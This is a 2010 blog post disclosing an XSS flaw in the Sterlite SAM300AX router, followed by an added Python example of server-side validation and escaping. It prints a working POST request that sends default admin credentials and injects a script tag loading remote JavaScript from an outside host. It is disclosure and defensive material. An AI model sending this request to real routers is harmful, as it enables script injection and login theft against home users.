Sunday, February 7, 2010

Sterlite SAM300AX ADSL router Cross Site Scripting (XSS)


Well, I reported XSS in Sterlite router on Feb 5, 2010.

Sterlite SAM300AX is used by broadband customers in Delhi and Mumbai, India. Given the customer base of MTNL in these 2 metro cities, this vulnerability may be extremely useful for an attacker and / or a bot herder looking for new bots.

After waiting 2+ weeks for a vendor response, I decided to publish this to Full Disclosure/publicly.


Sharing the vuln POST request and parameters here:

POST Request
POST http://192.168.1.1/Forms/status_statistics_1 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 Paros/3.2.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://192.168.1.1/status/status_statistics.htm
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Content-length: 101
POST Parameters
Stat_Radio=%3CSCRIPT%20SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E&StatRefresh=REFRESH

Impact
Remote script / code execution, login theft and other nasty things.
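
For anyone maintaining a form handler like this one, the check below shows the server-side step that was missing. It is an added example, not code from the original post or from the router firmware: the body of the POST request above is percent-decoded, each field is validated against an allowlist pattern, and anything echoed back is HTML-encoded. The token pattern, the `Zero` value, the page text and the function names are assumptions.

```python
import html
import re
from urllib.parse import parse_qs

# Form body copied from the POST request in this post.
REPORTED_BODY = (
    "Stat_Radio=%3CSCRIPT%20SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js"
    "%3E%3C%2FSCRIPT%3E&StatRefresh=REFRESH"
)
# Constructed benign body; "Zero" is an assumed radio-button value.
BENIGN_BODY = "Stat_Radio=Zero&StatRefresh=REFRESH"

# Assumption: both fields only ever carry a short alphanumeric token.
TOKEN = re.compile(r"[A-Za-z0-9_]{1,32}")
EXPECTED_FIELDS = ("Stat_Radio", "StatRefresh")


def check_form(body):
    """Percent-decode the body and split fields into (accepted, rejected)."""
    accepted, rejected = {}, {}
    fields = parse_qs(body, keep_blank_values=True)
    for name, values in fields.items():
        # Repeated or unknown fields are rejected rather than guessed at.
        ok = (name in EXPECTED_FIELDS and len(values) == 1
              and TOKEN.fullmatch(values[0]) is not None)
        (accepted if ok else rejected)[name] = values[-1]
    return accepted, rejected


def handle(body):
    """Return (status, html_fragment) the way a hardened handler would."""
    accepted, rejected = check_form(body)
    if rejected:
        # The error page names the field but never echoes the raw value.
        names = ", ".join(html.escape(n) for n in sorted(rejected))
        return 400, "<p>Invalid value for: " + names + "</p>"
    # Second layer: encode on output even though validation passed.
    choice = html.escape(accepted.get("Stat_Radio", ""))
    return 200, "<p>Statistics for " + choice + "</p>"


if __name__ == "__main__":
    print(handle(REPORTED_BODY))
    print(handle(BENIGN_BODY))
```

Validation and output encoding are kept as two separate layers so that a value which slips past one is still neutralised by the other.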
##########
Vulnerability Found: January 19, 2010 
Vendor First Notified: January 20, 2010 
Vendor Response: None 
Follow Up Notification: January 27, 2010 
Vendor Response: None 
Public Disclosure: February 05, 2010 
##########

You can read the full details here:
http://secunia.com/advisories/38463/
